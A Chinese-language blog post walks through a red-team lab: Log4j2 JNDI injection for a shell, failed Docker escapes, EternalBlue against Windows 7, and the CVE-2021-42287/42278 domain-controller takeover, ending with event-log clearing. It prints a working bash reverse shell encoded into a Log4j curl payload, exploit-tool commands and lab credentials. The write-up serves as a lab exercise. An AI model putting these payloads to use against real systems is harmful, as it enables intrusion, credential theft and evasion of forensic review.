渗透攻击红队内网域渗透靶场2

descript

渗透过程概述:

1、信息收集-->Logj2漏洞利用getshell-->docker逃逸失败

利用dnsLog验证log4j2漏洞,kali开启http和ladp服务,构造bash一句话payload,连接nc。验证docker环境,利用runC漏洞和特权模式 都逃逸失败了。

2、内网渗透-->域控

利用永恒之蓝,使win7上线msf,hash dump。CVE-2021-42287、CVE-2021-42278 打域控。


外网服务器:ubantu16

ip:192.168.1.103

user:saul

pass:Saul123

# 重启后,需要手动重新启动 Docker 容器

sudo docker start cc4ddedd1727

域个人机器

hostname:win7

本地用户:hong:密码空

域账户:redteam/root:Red12345

域控:

hostname:AD

user : Administrator

pass : admin!@#45


1、信息收集

1.1 配置靶场,启动docker

sudo docker start cc4ddedd1727

1.2 端口扫描

2、漏洞挖掘【Log4j2漏洞验证】

curl 192.168.1.103:38080/hello -X POST -d 'payload=${jndi:ldap://ht2zhw.dnslog.cn/aa}'

descript

3、漏洞利用【Log4j2-RCE 漏洞利用getshell】

3.1 kali 开启http(8080)和LDAP(1389)服务

./JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.102

descript

3.2 nc开启监听

nc -lvnp 9001

3.3 构造payload

bash一句话:

bash -i >& /dev/tcp/192.168.1.102/9001 0>&1

base64编码:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAyLzkwMDEgMD4mMQ==

对+号进行URL编码:

YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAyLzkwMDEgMD4mMQ==

构造payload:

curl 192.168.1.103:38080/hello -X POST -d 'payload=${jndi:ldap://192.168.1.102:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAyLzkwMDEgMD4mMQ==}'

descriptdescript

3.4 连接nc,获取root权限会话

descript

4、提权

4.1 docker逃逸失败

4.1.1 验证docker环境

ls /.dockerenv

cat /proc/self/cgroup

descript

4.1.2 docker runC漏洞逃逸(失败)

runc < 1.0-rc6 (Docker < 18.09.2) ,版本太高

descript

4.1.3 特权模式逃逸(失败)

容器未设置privileged特权模式

cat /proc/self/status|grep CapEff

fdisk -l

descript

4.2 根据flag.txt里的账号密码,ssh连接ubuntu

ssh saul@192.168.1.103

descript

5、内网渗透【win7渗透】

5.1 添加路由,主机发现,端口扫描,信息收集

5.2 ms17_010_eternalblue 永恒之蓝

5.3 上传b.exe并执行,msf正向连接win7

5.4 hash dump

6、横向移动【域控2012渗透】

6.1 CVE-2021-42287、CVE-2021-42278

python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.10.10.12 -shell

7、权限维持

8、痕迹清理

8.1 clearev

descript

8.2 run event_manager -c

descript

9、总结

posted @ 2023-03-23 13:38  hello_bao  阅读(488)  评论(0)    收藏  举报